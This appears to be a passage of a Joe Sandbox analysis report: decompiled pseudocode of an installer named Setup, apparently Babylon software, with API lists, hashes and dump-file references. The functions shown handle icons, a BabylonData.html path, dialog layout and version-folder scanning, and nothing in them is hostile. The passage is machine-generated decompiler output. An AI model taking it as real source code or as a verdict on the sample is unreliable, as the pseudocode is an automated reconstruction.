                                                                                                                                                              0x004caea9
                                                                                                                                                              0x004caeb1
                                                                                                                                                              0x004caec0
                                                                                                                                                              0x004caed6
                                                                                                                                                              0x004caed9
                                                                                                                                                              0x004caed9
                                                                                                                                                              0x004caef2

                                                                                                                                                              APIs
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000002.00000002.359012416.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000002.00000002.359001530.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359261162.000000000051B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359338019.0000000000561000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359376562.0000000000562000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359452594.00000000005BB000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359452594.00000000005C0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359476610.00000000005C5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_2_2_400000_Setup.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: MetricsSystem$ImageLoadwsprintf
                                                                                                                                                              • String ID: icon%d
                                                                                                                                                              • API String ID: 3909377768-3280701045
                                                                                                                                                              • Opcode ID: 2d9cc9c1688a22febf2ed6e05615a5419e729802003467ace3d98fd594a0b198
                                                                                                                                                              • Instruction ID: de662ed2c80c83afdf942a6c1c8f2b8e47cdcb8d8a5d1dcf82a73053b9f924e1
                                                                                                                                                              • Opcode Fuzzy Hash: 2d9cc9c1688a22febf2ed6e05615a5419e729802003467ace3d98fd594a0b198
                                                                                                                                                              • Instruction Fuzzy Hash: 29115E75A10108AFDB44DFB8DC81EEEB7BAEB99710F00C629F815D7290E7349904DB94
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 004CC800 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 31COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              C-Code - Quality: 100%
                                                                                                                                                              			E004CC800(void* __ebx, void* __edi, void* __esi) {

				if(( *0x5c1ed0 & 0x0000ffff) == 0) {
					if(E004C5660(0xf, 0) != 1) {
						E004F8180(__ebx, 0x5be0a0, __edi, __esi, 0x5c1ed0, 0x1b, L"BabylonData.html");
						if(( *0x5c1ed0 & 0x0000ffff) == 0) {
							E0045184A(0x5c1ed0, L"c:\\temp\\BabylonData.html");
						}
					} else {
						E0045184A(0x5c1ed0, L"www.babylon.com/ClientData.html");
					}
				}
				return 0x5c1ed0;
			}



                                                                                                                                                              0x004cc80c
                                                                                                                                                              0x004cc81d
                                                                                                                                                              0x004cc844
                                                                                                                                                              0x004cc852
                                                                                                                                                              0x004cc85e
                                                                                                                                                              0x004cc863
                                                                                                                                                              0x004cc81f
                                                                                                                                                              0x004cc829
                                                                                                                                                              0x004cc82e
                                                                                                                                                              0x004cc81d
                                                                                                                                                              0x004cc86c

                                                                                                                                                              APIs
                                                                                                                                                              Strings
                                                                                                                                                              • BabylonData.html, xrefs: 004CC833
                                                                                                                                                              • www.babylon.com/ClientData.html, xrefs: 004CC81F
                                                                                                                                                              • c:\temp\BabylonData.html, xrefs: 004CC854
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000002.00000002.359012416.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000002.00000002.359001530.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359261162.000000000051B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359338019.0000000000561000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359376562.0000000000562000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359452594.00000000005BB000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359452594.00000000005C0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359476610.00000000005C5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_2_2_400000_Setup.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: _wcscpy
                                                                                                                                                              • String ID: BabylonData.html$c:\temp\BabylonData.html$www.babylon.com/ClientData.html
                                                                                                                                                              • API String ID: 3048848545-2817021312
                                                                                                                                                              • Opcode ID: 302cb4f288442af32d7dc266d49bd033a5520ec215228117e118cdd053b920fb
                                                                                                                                                              • Instruction ID: 680570e49307a0ca327cc94fd27d678254eafae66515bd49608ecbf4d387509a
                                                                                                                                                              • Opcode Fuzzy Hash: 302cb4f288442af32d7dc266d49bd033a5520ec215228117e118cdd053b920fb
                                                                                                                                                              • Instruction Fuzzy Hash: 16E01C74B8170865D66436832C43F262D492721FCAF08043EF90AA82C3E9DDD644116E
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 004CDBD0 Relevance: 7.8, APIs: 5, Instructions: 274windowCOMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              C-Code - Quality: 87%
                                                                                                                                                              			E004CDBD0(void* __ebx, intOrPtr __ecx, void* __edx, void* __edi) {
				int _v8;
				char _v16;
				signed int _v20;
				char _v36;
				intOrPtr _v40;
				intOrPtr _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				intOrPtr _v56;
				intOrPtr _v60;
				char _v64;
				intOrPtr _v68;
				intOrPtr _v72;
				struct HMENU__* _v76;
				char _v108;
				char _v109;
				intOrPtr _v116;
				signed int _v120;
				void* __esi;
				signed int _t105;
				void* _t134;
				void* _t139;
				void* _t143;
				void* _t166;
				void* _t172;
				void* _t252;
				char* _t259;
				void* _t269;
				void* _t270;
				signed int _t277;

				_t269 = __edi;
				_t252 = __edx;
				_t172 = __ebx;
				_push(0xffffffff);
				_push(0x50f2b6);
				_push( *[fs:0x0]);
				_push(_t270);
				_t105 =  *0x561244; // 0xddd124f9
				_push(_t105 ^ _t277);
				 *[fs:0x0] =  &_v16;
				_v116 = __ecx;
				E00434E30( &_v64);
				E00416B80( &_v36);
				if((E00404730(0x5c1160, 0xffffffff) & 0x000000ff) != 0) {
					E0042E600(_v116 + 4, 0, 0x400000, 0);
				}
				E004CD1E0(_t172, _v116, _t269, _t270,  &_v64);
				asm("cdq");
				E004CD430(_v116 + 0x20,  *((intOrPtr*)(_v116 + 4)), 0xc, (_v60 - _t252 >> 1) + 4);
				if((E00416630(_v116 + 0x70) & 0x000000ff) != 0) {
					_t166 = E00434050( &_v109);
					E00417910(E00403C30(0x5be390), _t166);
					_v8 = 0;
					E004181D0(_v116 + 0x6c,  &_v108);
					_v8 = 0xffffffff;
					E004176E0();
				}
				E004161C0(_v116 + 4, E00416A30(_v116 + 0x70));
				E0042E8D0(_v116 + 4, E0042E0E0(0x5c1160), 1);
				_v68 = E004CD9E0(_t172, _v116 + 0x8c, _t269, _t270,  *((intOrPtr*)(_v116 + 4)), 0x14b);
				_v52 = E004CD9E0(_t172, _v116 + 0xa4, _t269, _t270,  *((intOrPtr*)(_v116 + 4)), 0x14c);
				_v40 = E004CD9E0(_t172, _v116 + 0xbc, _t269, _t270,  *((intOrPtr*)(_v116 + 4)), 0x14d);
				if(_v40 == 0) {
					_v120 = 0 | _v52 != 0x00000000;
				} else {
					_v120 = 2;
				}
				_v48 = _v68 + _v52 + _v40 + _v120 * 0xa;
				_v44 = E0042E680(_v48 + 0x18, _v48 + 0x18, _v64 + 0x50);
				_t134 = E0042E0C0(_v116 + 0x8c);
				_v56 = _t134 + _v60 + GetSystemMetrics(4) + 0x42;
				E00416C20(_v116 + 4, 0, 0, 0, _v44, _v56, 6);
				_t259 =  &_v36;
				E00416BC0(_v116 + 4, _t259);
				_t139 = E00419D10( &_v36);
				asm("cdq");
				_v20 = _t139 - _v48 - _t259 >> 1;
				_t143 = E00419D30( &_v36);
				_v72 = _t143 - 0x14 - E0042E0C0(_v116 + 0x8c);
				E004CD0F0(_v116 + 0x8c, _v20, _v72);
				if(_v52 != 0) {
					_t72 = _v68 + 0xa; // 0x11a
					_v20 = _v20 + _t72;
					E004CD0F0(_v116 + 0xa4, _v20, _v72);
				}
				if(_v40 != 0) {
					_t81 = _v52 + 0xa; // 0x11a
					_v20 = _v20 + _t81;
					E004CD0F0(_v116 + 0xbc, _v20, _v72);
				}
				if( *((intOrPtr*)(_v116 + 0xd4)) != 0) {
					_v76 = E0042E510(_v116 + 4, 0);
					EnableMenuItem(_v76, 0xf060, 1);
					RemoveMenu(_v76, 0xf060, 0);
				}
				E00415CA0(_v116 + 4, 0);
				if(( *(_v116 + 0xd8) & 0x00010000) != 0) {
					E004965D0( *((intOrPtr*)(_v116 + 4)), 1, 0);
				}
				if(( *(_v116 + 0xd8) & 0x00040000) != 0) {
					E00416C20(_v116 + 4, 0xffffffff, 0, 0, 0, 0, 3);
				}
				MessageBeep(E0042E070(_v116 + 0x20));
				E0042E530(_v116 + 0x8c, 0, 1, 0);
				E00415F30(_v116 + 0x8c);
				 *[fs:0x0] = _v16;
				return 0;
			}

































                                                                                                                                                              0x004cdbd0
                                                                                                                                                              0x004cdbd0
                                                                                                                                                              0x004cdbd0
                                                                                                                                                              0x004cdbd3
                                                                                                                                                              0x004cdbd5
                                                                                                                                                              0x004cdbe0
                                                                                                                                                              0x004cdbe4
                                                                                                                                                              0x004cdbe5
                                                                                                                                                              0x004cdbec
                                                                                                                                                              0x004cdbf0
                                                                                                                                                              0x004cdbf6
                                                                                                                                                              0x004cdbfc
                                                                                                                                                              0x004cdc04
                                                                                                                                                              0x004cdc1a
                                                                                                                                                              0x004cdc2b
                                                                                                                                                              0x004cdc2b
                                                                                                                                                              0x004cdc37
                                                                                                                                                              0x004cdc3f
                                                                                                                                                              0x004cdc57
                                                                                                                                                              0x004cdc6c
                                                                                                                                                              0x004cdc71
                                                                                                                                                              0x004cdc85
                                                                                                                                                              0x004cdc8a
                                                                                                                                                              0x004cdc9b
                                                                                                                                                              0x004cdca0
                                                                                                                                                              0x004cdcaa
                                                                                                                                                              0x004cdcaa
                                                                                                                                                              0x004cdcc1
                                                                                                                                                              0x004cdcd9
                                                                                                                                                              0x004cdcf8
                                                                                                                                                              0x004cdd15
                                                                                                                                                              0x004cdd32
                                                                                                                                                              0x004cdd39
                                                                                                                                                              0x004cdd4d
                                                                                                                                                              0x004cdd3b
                                                                                                                                                              0x004cdd3b
                                                                                                                                                              0x004cdd3b
                                                                                                                                                              0x004cdd61
                                                                                                                                                              0x004cdd7a
                                                                                                                                                              0x004cdd86
                                                                                                                                                              0x004cdd9c
                                                                                                                                                              0x004cddb5
                                                                                                                                                              0x004cddba
                                                                                                                                                              0x004cddc4
                                                                                                                                                              0x004cddcc
                                                                                                                                                              0x004cddd4
                                                                                                                                                              0x004cddd9
                                                                                                                                                              0x004cdddf
                                                                                                                                                              0x004cddf9
                                                                                                                                                              0x004cde0d
                                                                                                                                                              0x004cde16
                                                                                                                                                              0x004cde1e
                                                                                                                                                              0x004cde22
                                                                                                                                                              0x004cde36
                                                                                                                                                              0x004cde36
                                                                                                                                                              0x004cde3f
                                                                                                                                                              0x004cde47
                                                                                                                                                              0x004cde4b
                                                                                                                                                              0x004cde5f
                                                                                                                                                              0x004cde5f
                                                                                                                                                              0x004cde6e
                                                                                                                                                              0x004cde7d
                                                                                                                                                              0x004cde8b
                                                                                                                                                              0x004cde9c
                                                                                                                                                              0x004cde9c
                                                                                                                                                              0x004cdeaa
                                                                                                                                                              0x004cdebe
                                                                                                                                                              0x004cdecb
                                                                                                                                                              0x004cded0
                                                                                                                                                              0x004cdee2
                                                                                                                                                              0x004cdef6
                                                                                                                                                              0x004cdef6
                                                                                                                                                              0x004cdf07
                                                                                                                                                              0x004cdf1c
                                                                                                                                                              0x004cdf2a
                                                                                                                                                              0x004cdf34
                                                                                                                                                              0x004cdf40

                                                                                                                                                              APIs
                                                                                                                                                              • std::_Iterator_base::_Iterator_base.LIBCPMTD ref: 004CDBFC
                                                                                                                                                                • Part of subcall function 0042E600: GetWindowLongW.USER32(?,000000EC), ref: 0042E611
                                                                                                                                                              • GetSystemMetrics.USER32 ref: 004CDD92
                                                                                                                                                                • Part of subcall function 00416C20: SetWindowPos.USER32(00000001,?,00000001,00000005,004044DF,?,?,?,?,004EFD0C,00000000,00000000,00000000,00000005,?,00000004), ref: 00416C45
                                                                                                                                                                • Part of subcall function 00416BC0: GetClientRect.USER32 ref: 00416BD1
                                                                                                                                                              • EnableMenuItem.USER32 ref: 004CDE8B
                                                                                                                                                              • RemoveMenu.USER32(?,0000F060,00000000), ref: 004CDE9C
                                                                                                                                                              • MessageBeep.USER32(00000000), ref: 004CDF07
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000002.00000002.359012416.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000002.00000002.359001530.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359261162.000000000051B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359338019.0000000000561000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359376562.0000000000562000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359452594.00000000005BB000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359452594.00000000005C0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359476610.00000000005C5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_2_2_400000_Setup.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: MenuWindow$BeepClientEnableItemIterator_baseIterator_base::_LongMessageMetricsRectRemoveSystemstd::_
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 3709759844-0
                                                                                                                                                              • Opcode ID: d18e896ed6cc584995477ae8e3a215a032c5fbb3674882c8c2e3b7c3441ed65e
                                                                                                                                                              • Instruction ID: e35076c34520df2c1742b85c3f81cfe91c87fcedef95cc6cbe397c04628284e5
                                                                                                                                                              • Opcode Fuzzy Hash: d18e896ed6cc584995477ae8e3a215a032c5fbb3674882c8c2e3b7c3441ed65e
                                                                                                                                                              • Instruction Fuzzy Hash: 13B13C71A101189BEB28DBE9DC91FEEB775FF44308F24412DE106BB2C2DA746941CB68
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 0045A8FF Relevance: 7.5, APIs: 5, Instructions: 47COMMONLIBRARYCODE
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              C-Code - Quality: 89%
                                                                                                                                                              			E0045A8FF(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				signed int _t15;
				LONG* _t21;
				long _t23;
				void* _t31;
				LONG* _t33;
				void* _t34;
				void* _t35;

				_t35 = __eflags;
				_t29 = __edx;
				_t25 = __ebx;
				_push(0xc);
				_push(0x544558);
				E00456860(__ebx, __edi, __esi);
				_t31 = E00457400(__ebx, __edx, __edi, _t35);
				_t15 =  *0x56195c; // 0xfffffffe
				if(( *(_t31 + 0x70) & _t15) == 0 ||  *((intOrPtr*)(_t31 + 0x6c)) == 0) {
					E00457DFC(_t25, 0xd);
					 *(_t34 - 4) =  *(_t34 - 4) & 0x00000000;
					_t33 =  *(_t31 + 0x68);
					 *(_t34 - 0x1c) = _t33;
					__eflags = _t33 -  *0x561860; // 0x2161670
					if(__eflags != 0) {
						__eflags = _t33;
						if(_t33 != 0) {
							_t23 = InterlockedDecrement(_t33);
							__eflags = _t23;
							if(_t23 == 0) {
								__eflags = _t33 - 0x561438;
								if(__eflags != 0) {
									_push(_t33);
									E0044FAFC(_t25, _t31, _t33, __eflags);
								}
							}
						}
						_t21 =  *0x561860; // 0x2161670
						 *(_t31 + 0x68) = _t21;
						_t33 =  *0x561860; // 0x2161670
						 *(_t34 - 0x1c) = _t33;
						InterlockedIncrement(_t33);
					}
					 *(_t34 - 4) = 0xfffffffe;
					E0045A99A();
				} else {
					_t33 =  *(_t31 + 0x68);
				}
				if(_t33 == 0) {
					E00457948(_t29, _t31, 0x20);
				}
				return E004568A5(_t33);
			}










                                                                                                                                                              0x0045a8ff
                                                                                                                                                              0x0045a8ff
                                                                                                                                                              0x0045a8ff
                                                                                                                                                              0x0045a8ff
                                                                                                                                                              0x0045a901
                                                                                                                                                              0x0045a906
                                                                                                                                                              0x0045a910
                                                                                                                                                              0x0045a912
                                                                                                                                                              0x0045a91a
                                                                                                                                                              0x0045a93b
                                                                                                                                                              0x0045a941
                                                                                                                                                              0x0045a945
                                                                                                                                                              0x0045a948
                                                                                                                                                              0x0045a94b
                                                                                                                                                              0x0045a951
                                                                                                                                                              0x0045a953
                                                                                                                                                              0x0045a955
                                                                                                                                                              0x0045a958
                                                                                                                                                              0x0045a95e
                                                                                                                                                              0x0045a960
                                                                                                                                                              0x0045a962
                                                                                                                                                              0x0045a968
                                                                                                                                                              0x0045a96a
                                                                                                                                                              0x0045a96b
                                                                                                                                                              0x0045a970
                                                                                                                                                              0x0045a968
                                                                                                                                                              0x0045a960
                                                                                                                                                              0x0045a971
                                                                                                                                                              0x0045a976
                                                                                                                                                              0x0045a979
                                                                                                                                                              0x0045a97f
                                                                                                                                                              0x0045a983
                                                                                                                                                              0x0045a983
                                                                                                                                                              0x0045a989
                                                                                                                                                              0x0045a990
                                                                                                                                                              0x0045a922
                                                                                                                                                              0x0045a922
                                                                                                                                                              0x0045a922
                                                                                                                                                              0x0045a927
                                                                                                                                                              0x0045a92b
                                                                                                                                                              0x0045a930
                                                                                                                                                              0x0045a938

                                                                                                                                                              APIs
                                                                                                                                                              • __getptd.LIBCMT ref: 0045A90B
                                                                                                                                                                • Part of subcall function 00457400: __getptd_noexit.LIBCMT ref: 00457403
                                                                                                                                                                • Part of subcall function 00457400: __amsg_exit.LIBCMT ref: 00457410
                                                                                                                                                              • __amsg_exit.LIBCMT ref: 0045A92B
                                                                                                                                                              • __lock.LIBCMT ref: 0045A93B
                                                                                                                                                              • InterlockedDecrement.KERNEL32(?), ref: 0045A958
                                                                                                                                                              • InterlockedIncrement.KERNEL32(02161670), ref: 0045A983
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000002.00000002.359012416.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000002.00000002.359001530.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359261162.000000000051B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359338019.0000000000561000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359376562.0000000000562000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359452594.00000000005BB000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359452594.00000000005C0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359476610.00000000005C5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_2_2_400000_Setup.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lock
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 4271482742-0
                                                                                                                                                              • Opcode ID: e37120ae664283ea350632c9a41c2ae7b57840983f05399925188644f34e3bfb
                                                                                                                                                              • Instruction ID: 4086997c604cd4e60cdccecd4fb249213bd39f50572aee95531a34e2fe0cb1c3
                                                                                                                                                              • Opcode Fuzzy Hash: e37120ae664283ea350632c9a41c2ae7b57840983f05399925188644f34e3bfb
                                                                                                                                                              • Instruction Fuzzy Hash: 76010871901B25DBDB11AB2A940136E77A0BF00716F16061BEC00A7362C77C586DDBDF
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 0048C630 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 148COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              C-Code - Quality: 85%
                                                                                                                                                              			E0048C630(void* __ebx, void* __edi, void* __esi, void* __eflags, intOrPtr _a4) {
				char _v8;
				char _v16;
				char _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				char _v40;
				char _v44;
				signed int _v48;
				signed int _v52;
				WCHAR* _v56;
				signed int _v60;
				signed int _v61;
				char _v96;
				char _v124;
				char _v128;
				char _v132;
				intOrPtr _v136;
				intOrPtr _v140;
				signed int _t58;
				void* _t63;
				void* _t64;
				signed int _t70;
				signed int _t81;
				void* _t89;
				signed int _t140;
				void* _t141;
				void* _t143;
				void* _t145;

				_t139 = __esi;
				_t138 = __edi;
				_t96 = __ebx;
				_push(0xffffffff);
				_push(0x50d1f3);
				_push( *[fs:0x0]);
				_t58 =  *0x561244; // 0xddd124f9
				_push(_t58 ^ _t140);
				 *[fs:0x0] =  &_v16;
				E00405140(_a4 + 4);
				_t63 = E0048BD40(__ebx, __edi, __esi, __eflags, _a4);
				_t143 = _t141 - 0x7c + 4;
				if(_t63 == 0) {
					L16:
					__eflags = _a4 + 4;
					_t64 = E0042E0C0(_a4 + 4);
					 *[fs:0x0] = _v16;
					return _t64;
				}
				E0041F190( &_v28);
				_v8 = 0;
				if(_a4 == 0) {
					_v132 = 0;
				} else {
					_v132 = _a4 + 4;
				}
				_v136 = E004098D0( &_v124, _v132, "*");
				_v140 = _v136;
				_v8 = 1;
				E00409810(_v140);
				_v8 = 2;
				_t70 = E0049F0E0(_t96, _t138, _t139,  &_v96,  &_v28);
				_t145 = _t143 + 0x14;
				_v61 = _t70;
				_v8 = 1;
				E004176E0();
				_v8 = 0;
				E004178C0( &_v124);
				_t149 = _v61 & 0x000000ff;
				if((_v61 & 0x000000ff) == 0) {
					L15:
					_v8 = 0xffffffff;
					E0041F210();
					goto L16;
				} else {
					_v36 = 0;
					E0041F270( &_v28,  &_v40);
					while((E00434020( &_v40, _t149, E00407DE0( &_v28,  &_v128)) & 0x000000ff) != 0) {
						_t81 = GetFileAttributesW(E00416A30(E00422A60( &_v40) + 4));
						_t149 = _t81 & 0x00000010;
						if((_t81 & 0x00000010) != 0) {
							_v56 = PathFindFileNameW(E00416A30(E00422A60( &_v40) + 4));
							_push( &_v44);
							_push( &_v60);
							_push( &_v48);
							_t89 = E00452133(_v56, L"%d.%d.%d.%d",  &_v52);
							_t145 = _t145 + 0x18;
							__eflags = _t89 - 4;
							if(__eflags == 0) {
								_v32 = _v60 * 0x3e8 + _v44 + _v48 * 0xf4240 + _v52 * 0x5f5e100;
								__eflags = _v32 - _v36;
								if(__eflags > 0) {
									E004181D0(_a4, E00433FA0( &_v40));
									_v36 = _v32;
								}
							}
						}
						E00422A80( &_v40);
					}
					goto L15;
				}
			}































                                                                                                                                                              0x0048c630
                                                                                                                                                              0x0048c630
                                                                                                                                                              0x0048c630
                                                                                                                                                              0x0048c633
                                                                                                                                                              0x0048c635
                                                                                                                                                              0x0048c640
                                                                                                                                                              0x0048c644
                                                                                                                                                              0x0048c64b
                                                                                                                                                              0x0048c64f
                                                                                                                                                              0x0048c65b
                                                                                                                                                              0x0048c664
                                                                                                                                                              0x0048c669
                                                                                                                                                              0x0048c66e
                                                                                                                                                              0x0048c80c
                                                                                                                                                              0x0048c80f
                                                                                                                                                              0x0048c812
                                                                                                                                                              0x0048c81a
                                                                                                                                                              0x0048c825
                                                                                                                                                              0x0048c825
                                                                                                                                                              0x0048c677
                                                                                                                                                              0x0048c67c
                                                                                                                                                              0x0048c687
                                                                                                                                                              0x0048c694
                                                                                                                                                              0x0048c689
                                                                                                                                                              0x0048c68f
                                                                                                                                                              0x0048c68f
                                                                                                                                                              0x0048c6b0
                                                                                                                                                              0x0048c6bc
                                                                                                                                                              0x0048c6c2
                                                                                                                                                              0x0048c6d0
                                                                                                                                                              0x0048c6d5
                                                                                                                                                              0x0048c6e1
                                                                                                                                                              0x0048c6e6
                                                                                                                                                              0x0048c6e9
                                                                                                                                                              0x0048c6ec
                                                                                                                                                              0x0048c6f3
                                                                                                                                                              0x0048c6f8
                                                                                                                                                              0x0048c6ff
                                                                                                                                                              0x0048c708
                                                                                                                                                              0x0048c70a
                                                                                                                                                              0x0048c7fd
                                                                                                                                                              0x0048c7fd
                                                                                                                                                              0x0048c807
                                                                                                                                                              0x00000000
                                                                                                                                                              0x0048c710
                                                                                                                                                              0x0048c710
                                                                                                                                                              0x0048c71e
                                                                                                                                                              0x0048c72d
                                                                                                                                                              0x0048c760
                                                                                                                                                              0x0048c766
                                                                                                                                                              0x0048c769
                                                                                                                                                              0x0048c786
                                                                                                                                                              0x0048c78c
                                                                                                                                                              0x0048c790
                                                                                                                                                              0x0048c794
                                                                                                                                                              0x0048c7a2
                                                                                                                                                              0x0048c7a7
                                                                                                                                                              0x0048c7aa
                                                                                                                                                              0x0048c7ad
                                                                                                                                                              0x0048c7d6
                                                                                                                                                              0x0048c7dc
                                                                                                                                                              0x0048c7df
                                                                                                                                                              0x0048c7ed
                                                                                                                                                              0x0048c7f5
                                                                                                                                                              0x0048c7f5
                                                                                                                                                              0x0048c7f8
                                                                                                                                                              0x0048c7ad
                                                                                                                                                              0x0048c728
                                                                                                                                                              0x0048c728
                                                                                                                                                              0x00000000
                                                                                                                                                              0x0048c72d

                                                                                                                                                              APIs
                                                                                                                                                              • GetFileAttributesW.KERNEL32(00000000,00000000,?,000000FF,?,?), ref: 0048C760
                                                                                                                                                              • PathFindFileNameW.SHLWAPI(00000000,?,?), ref: 0048C780
                                                                                                                                                              • _swscanf.LIBCMT ref: 0048C7A2
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000002.00000002.359012416.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000002.00000002.359001530.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359261162.000000000051B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359338019.0000000000561000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359376562.0000000000562000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359452594.00000000005BB000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359452594.00000000005C0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359476610.00000000005C5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_2_2_400000_Setup.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: File$AttributesFindNamePath_swscanf
                                                                                                                                                              • String ID: %d.%d.%d.%d
                                                                                                                                                              • API String ID: 1908479623-3491811756
                                                                                                                                                              • Opcode ID: 0ece26ce34b65153544ddba81e43c920b0dee0c3efa5f77aaf85a5df5da8da75
                                                                                                                                                              • Instruction ID: d6455b66e45acc822c30ab2818c2ba454160a257f257a69446c1519ea5a7681a
                                                                                                                                                              • Opcode Fuzzy Hash: 0ece26ce34b65153544ddba81e43c920b0dee0c3efa5f77aaf85a5df5da8da75
                                                                                                                                                              • Instruction Fuzzy Hash: AC518371D001089BDF04EFA5D991BEEBBB5EF54304F14856EE502B7281EB38AA45CB68
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 0042F090 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 133COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              C-Code - Quality: 82%
                                                                                                                                                              			E0042F090(intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edi, intOrPtr __esi, unsigned int _a4, intOrPtr _a8) {
				intOrPtr _v8;
				char _v16;
				char _v20;
				unsigned int _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				unsigned int _v36;
				signed int _v40;
				intOrPtr _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				intOrPtr _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				intOrPtr _v72;
				void* _v76;
				signed int _t68;
				signed int _t69;
				void* _t74;
				void* _t89;
				intOrPtr _t94;
				intOrPtr _t101;
				intOrPtr _t133;
